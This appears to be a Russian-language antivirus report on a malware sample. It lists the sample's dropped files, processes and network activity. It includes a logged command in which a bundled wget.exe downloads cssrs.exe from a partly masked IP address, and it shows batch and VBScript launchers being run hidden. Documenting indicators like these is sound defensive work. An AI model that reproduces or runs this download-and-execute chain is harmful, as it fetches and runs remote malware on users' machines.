Техническая информация
- '%TEMP%\RarSFX0\cssrs.exe'
- '%TEMP%\RarSFX0\wget.exe' http://78.##0.171.50/squirrelmail/data/cssrs.exe
- '%TEMP%\RarSFX0\cssrs.exe' (загружен из сети Интернет)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\file.bat" "
- '<SYSTEM32>\wscript.exe' "%TEMP%\RarSFX0\hidebat.vbs"
- %TEMP%\RarSFX0\wget.exe
- %TEMP%\RarSFX0\cssrs.exe
- %TEMP%\RarSFX0\file.bat
- %TEMP%\RarSFX0\hidebat.vbs
- %TEMP%\RarSFX0\cssrs.exe
- %TEMP%\RarSFX0\wget.exe
- %TEMP%\RarSFX0\hidebat.vbs
- '78.##0.171.50':80
- 78.##0.171.50/squirrelmail/data/cssrs.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''